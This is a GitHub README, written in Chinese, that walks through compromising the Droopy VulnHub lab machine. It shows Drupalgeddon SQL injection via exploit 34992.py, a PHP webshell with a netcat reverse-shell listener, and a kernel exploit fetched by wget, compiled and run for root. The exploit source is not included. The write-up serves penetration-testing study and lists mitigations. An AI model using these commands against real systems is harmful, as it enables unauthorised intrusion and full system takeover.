Salik921/Droopy-Vuln-Hub-Writeup

GitHub: Salik921/Droopy-Vuln-Hub-Writeup

Droopy VulnHub靶机的完整渗透测试walkthrough,涵盖Drupal 7 SQL注入利用、Webshell上传及Linux内核提权的全流程攻击链演示。

Stars: 0 | Forks: 0

# 🛡️ Droopy (VulnHub) – 远程利用与权限提升 ## 📌 描述 本项目演示了对 **Droopy (VulnHub)** 机器的完整渗透过程,通过利用过时的 **Drupal 7 CMS** 并借助一个**内核级权限提升漏洞**完成攻击。攻击链包括侦察、漏洞识别、漏洞利用以及获取 **root 权限**。 ⚠️ **注意:** 此测试是在受控实验室环境中进行的,仅用于教育目的。 ## 🛠 使用的工具 * Nmap * Nikto * Searchsploit * Python3 * Netcat * GCC 编译器 * Kali Linux ## 🧪 漏洞类型 * 过时的 CMS (Drupal 7) * SQL 注入 (基于漏洞利用) * 远程代码执行 (RCE) * 内核权限提升 ## 方法论 评估过程中采用了以下方法论: * 执行网络扫描以识别开放端口 * 对 Web 应用程序进行技术和漏洞枚举 * 识别过时的 Drupal CMS * 研究公开可用的漏洞利用程序 * 通过漏洞利用获取初始访问权限 * 上传 Webshell 以执行命令 * 执行本地枚举 * 利用内核漏洞提升权限 * 实现完整的系统沦陷 ## 🔍 漏洞利用步骤 ### 1️⃣ 侦察 * 执行 Nmap 扫描以识别开放端口 * 发现端口 80 上运行着 HTTP 服务 ``` nmap -sC -sV ``` 📸 截图: https://github.com/Salik921/Droopy-Vuln-Hub-Writeup/blob/5487ed0030f1d058baf47b3cd27aa3d136b0d5e2/Screenshot%202026-03-24%20203608.png ### 2️⃣ 枚举 * 使用 Nikto 扫描 Web 服务器 * 识别出 Drupal CMS * 手动检查确认了 Drupal 结构 ``` nikto -h http:// ``` 📸 截图: https://github.com/Salik921/Droopy-Vuln-Hub-Writeup/blob/51f97365df72d89fd14865bccbd0155db72d9b4f/Screenshot%202026-03-24%20203812.png ### 3️⃣ 漏洞识别 * 使用 Searchsploit 搜索已知漏洞 ``` searchsploit drupal 7 ``` * 发现多个针对 Drupal 7 的漏洞利用程序 * 确认 CMS 版本已过时且存在漏洞 📸 截图: https://github.com/Salik921/Droopy-Vuln-Hub-Writeup/blob/51f97365df72d89fd14865bccbd0155db72d9b4f/Screenshot%202026-03-24%20204215.png ### 4️⃣ 漏洞利用 * 使用了 Drupal 漏洞利用程序 (34992.py) ``` python3 34992.py -t http://<192.168.10.14>/ -u admin2 -p admin2 ``` 📌 Drupalgeddon SQL 注入漏洞利用程序 (34992.py) 此脚本 (34992.py) 是一个基于 Python 的漏洞利用程序,针对 Drupal 7(版本 7.0 至 7.31)中的一个严重 SQL 注入漏洞,该漏洞广为人知,被称为 Drupalgeddon。 该漏洞的存在是由于对数据库查询中用户提供的输入处理不当,允许攻击者在未经身份验证的情况下注入恶意 SQL 命令。 ⚙️ 影响 未经授权的数据库访问 创建管理员账户 完全沦陷网站 远程代码执行(在某些情况下) * 成功创建了管理员账户 * 获得了管理面板的访问权限 📸 截图: https://github.com/Salik921/Droopy-Vuln-Hub-Writeup/blob/51f97365df72d89fd14865bccbd0155db72d9b4f/Screenshot%202026-03-24%20204425.png ### 5️⃣ 初始访问 (Webshell) * 导航至管理面板中的“添加内容” * 上传了恶意的 PHP Webshell * 启动了 Netcat 监听器 ``` nc -lvnp 4444 ``` * 触发了反向 Shell 📸 截图: https://github.com/Salik921/Droopy-Vuln-Hub-Writeup/blob/51f97365df72d89fd14865bccbd0155db72d9b4f/Screenshot%202026-03-24%20205117.png ### 6️⃣ 后渗透 * 枚举了系统信息 ``` uname -a lsb_release -a ``` * 识别了内核版本 📸 截图: https://github.com/Salik921/Droopy-Vuln-Hub-Writeup/blob/51f97365df72d89fd14865bccbd0155db72d9b4f/Screenshot%202026-03-24%20205117.png ### 7️⃣ 权限提升 * 搜索了内核漏洞利用程序 ``` searchsploit linux | grep -i 3.13 | grep -i kernal ``` * 发现了漏洞利用程序 (37292.c) 📸 截图: https://github.com/Salik921/Droopy-Vuln-Hub-Writeup/blob/8a4d5ac4b7d9401e72bbfc57d4d25bb563478ade/Screenshot%202026-03-28%20132712.png ### 传输漏洞利用程序 ``` python3 -m http.server 8000 wget http://<192.168.10.14>:8000/37292.c ``` ### 编译与执行 ``` gcc 37292.c -o exploit chmod +x exploit ./exploit ``` * 成功获取 Root 访问权限 📸 截图: https://github.com/Salik921/Droopy-Vuln-Hub-Writeup/blob/82a2c7a13e4526b9c88027647f797932154be1f5/Screenshot%202026-03-24%20205637.png ## 💥 影响 * 完整的系统沦陷 * 获得了 Root 级别访问权限 * 能够执行任意命令 ## 🔐 缓解与预防 * 保持 CMS 更新(避免使用过时的 Drupal 版本) * 定期应用安全补丁 * 禁用不必要的模块 * 限制管理员访问 * 监控日志中的可疑活动 * 加固 Linux 内核并限制漏洞利用途径 ## 📚 学习成果 本项目演示了真实的渗透测试工作流程,包括: * Web 应用程序枚举 * 漏洞利用的研究与使用 * 通过 CMS 漏洞获取初始访问权限 * 权限提升技术 * 实现完整的系统沦陷 ## ⚠️ 免责声明 本项目**仅用于教育目的**。请勿在未经适当授权的情况下尝试利用系统。 ## 👨‍💻 作者 **Salik Karimkhan** * 渴望成长的渗透测试人员 💀
标签:CISA项目, CTF学习, CTI, Cutter, Drupal 7, Nikto, Nmap, RCE, Searchsploit, VulnHub, Webshell, Web安全, Web报告查看器, 内核漏洞, 内网渗透, 初始访问, 协议分析, 密码管理, 提权, 插件系统, 权限提升, 编程工具, 网络安全, 蓝队分析, 虚拟驱动器, 远程代码执行, 逆向工具, 隐私保护, 靶场攻略